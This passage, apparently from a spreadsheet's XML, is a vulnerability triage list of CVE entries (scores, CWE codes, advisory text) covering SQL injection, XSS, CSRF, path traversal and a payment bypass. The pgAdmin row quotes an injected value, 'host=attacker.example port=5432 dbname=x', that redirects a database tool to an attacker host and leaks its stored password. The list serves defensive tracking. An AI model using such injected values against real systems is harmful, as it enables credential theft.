          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Use of HTTP Request With Sensitive Query String vulnerability in team-alembic AshAuthenticationPhoenix allows someone able to read access logs, proxy logs or browser history to recover a single-use sign-in token and authenticate as its owner.
After a successful password sign-in, AshAuthentication.Phoenix.Components.Password.SignInForm builds the sign_in_with_token path with the freshly issued user.__metadata__.token as a query parameter and redirects the browser to it with a GET. The token therefore travels in the request line, where web servers, reverse proxies, request telemetry and the browser's own history record it, all of which outlive the request and are ordinarily less protected than session storage. The redirect destination is restricted to a local path, so this is not an open redirect; the exposure is the retention of a live credential.
This issue affects ash_authentication_phoenix: from 1.7.0 before 2.17.4 and from 3.0.0-rc.0 before 3.0.0-rc.11; ash_authentication: from 3.10.5 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81632</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92919</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 fails to sanitize client-supplied filenames in the upload handler, allowing authenticated users to write files outside the storage root on Windows deployments. Attackers can use dot-dot path segments in filenames to escape the configured storage directory and overwrite arbitrary files accessible to the server process.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92919</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92980</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>HortusFox-Web prior to version 6.1 contains a remote code execution vulnerability that allows authenticated administrators to execute arbitrary OS commands as the web server user by abusing the Import/Export functionality. Attackers can leverage the Import/Export feature, which is intended solely for data portability, to deploy and execute malicious code on the underlying application server host.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92980</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15697</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>The Dictionary WordPress plugin through 1.0 does not escape user input before reflecting it back in the responses of several directly accessible scripts, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against anyone they can induce to submit a crafted request.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15697</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44236</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized connection.tune.frame_max value during amqp_login(), and rabbitmq-c accepts the value in amqp_login_inner() in librabbitmq/amqp_socket.c. amqp_tune_connection() in librabbitmq/amqp_connection.c uses frame_max to reallocate the outbound buffer without enforcing AMQP_FRAME_MIN_SIZE. Immediate serialization of connection.tune-ok through amqp_frame_to_bytes() writes beyond the undersized heap allocation, causing memory corruption and likely denial of service. An on-path attacker can also trigger the flaw against plaintext AMQP traffic. Code execution is theoretically possible but was not demonstrated. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44236</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52851</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Traccar is an open source GPS tracking system. Prior to 6.14.0, an authenticated, non-readonly user with access to an object usable in a permission pair can submit DELETE /api/permissions with an extra attacker-controlled JSON key. Permission(LinkedHashMap&lt;String, Long&gt;) in src/main/java/org/traccar/model/Permission.java validates only the first two keys, but DatabaseStorage.removePermission() in src/main/java/org/traccar/storage/DatabaseStorage.java concatenates every map key into the SQL WHERE clause as a column identifier. The extra key therefore becomes attacker-controlled SQL and provides a blind boolean or error oracle that can extract arbitrary database values, including administrator email, password hashes, and salts, or conditionally delete permission rows. Unauthenticated requests are rejected. This issue is fixed in 6.14.0.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52851</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54510</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-352</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Speakr is a personal, self-hosted web application designed for transcribing audio recordings. Prior to 0.8.21-alpha, the csrf_exempt_for_api_tokens() before_request hook in src/app.py calls csrf.exempt(view_func), permanently adding the selected view to Flask-WTF's process-global exemption set. The is_token_authenticated() function in src/utils/token_auth.py calls extract_token_from_request() and treats any present token, including request.args.get('token'), as authenticated without hashing the token, querying the database, or checking validity. A network-reachable attacker can therefore send a false token to disable CSRF protection for the targeted view for the worker lifetime. Because the exemption applies to the view function across HTTP methods, a cross-origin GET to /account with a query token can poison CSRF state for a later state-changing POST without triggering CORS preflight. This browser sequence requires attacker-controlled content on a sibling subdomain under the documented cookie conditions. The bypass can modify profile data, custom prompts, transcription settings, preferences, and administrative status through routes such as admin_toggle_admin. The change_password route also skips current-password verification when current_user.password is empty, allowing the chain to set a local password on an SSO-only account and bypass SSO. This issue is fixed in version 0.8.21-alpha.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54510</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54524</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Frappe HR is an open-source human resources management solution (HRMS). Prior to 16.7.0, an authenticated user with the HR User role can inject SQL through filters in the Salary Payments Based on Payment Mode report. In hrms/payroll/report/salary_payments_based_on_payment_mode/salary_payments_based_on_payment_mode.py, get_conditions constructs filter clauses from user-controlled values and get_data incorporates those clauses into a string-formatted SQL query, allowing extraction of arbitrary database data. This issue is fixed in 16.7.0.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54524</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54608</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-862</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>MythicalDash is a Pterodactyl client area. In 3.5.4-aurora and earlier, GET /api/stripe/process in backend/app/Api/System/Gateways/Stripe.php creates a pending row in mythicaldash_stripe_payments before Stripe checkout succeeds and embeds the payment code in the success redirect, while GET /api/stripe/processed accepts that code without constructing a Session, checking ownership, or retrieving the Stripe Checkout Session to require payment_status to be paid and amount_total to match the expected charge. An ordinary authenticated user can request an attacker-selected coins amount, abandon or fail payment, and submit the pending code directly to the unauthenticated processed endpoint. StripeDB::isPending() then permits User::addCreditsAtomic() to grant the unpaid amount and mark the row processed even though Stripe has not confirmed payment. This permits arbitrary free virtual-currency top-ups and direct financial loss through consumption of hosting resources. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54608</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66571</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Asset CleanUp: Page Speed Booster &lt;= 1.4.0.5 versions.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66571</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86049</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>pip:jupyter_server</t>
        </is>
      </c>
      <c r="M231" s="5" t="inlineStr">
        <is>
          <t>2.21.0</t>
        </is>
      </c>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Jupyter Server is the backend for Jupyter web applications. Prior to version 2.21.0, the 5xx request logging path in jupyter_server/log.py copies the Referer header into a JSON header block without applying the token scrubbing used for the request URI. A request that returns HTTP 500 while the Referer contains a token-bearing URL can therefore write that token to server logs in plaintext. An attacker who can read those logs can recover the token and use the affected user's Jupyter Server permissions. This issue is fixed in version 2.21.0.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86049</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86862</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-522, CWE-88, CWE-918</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.
The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.
The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. Where pg_restore requires a --dbname argument to be present, an empty value is passed, which contains no equals sign and is therefore not expanded, while the real name is taken from the environment.
This issue affects pgAdmin 4: from the introduction of the --dbname argument in the Restore and Maintenance tools before 9.18.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86862</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90887</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WP Inventory Manager &lt;= 2.5.4 versions.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90887</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90986</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Visitor Traffic Real Time Statistics Pro &lt;= 11.21 versions.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90986</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91014</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>The Realtyna Organic IDX plugin + WPL Real Estate WordPress plugin before 5.4.2 does not sanitise and escape some of its parameters before reflecting them back in the page, allowing unauthenticated attackers to run arbitrary web scripts in a visitor's browser if they can trick the visitor into following a crafted link (reflected XSS).</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91014</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92925</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
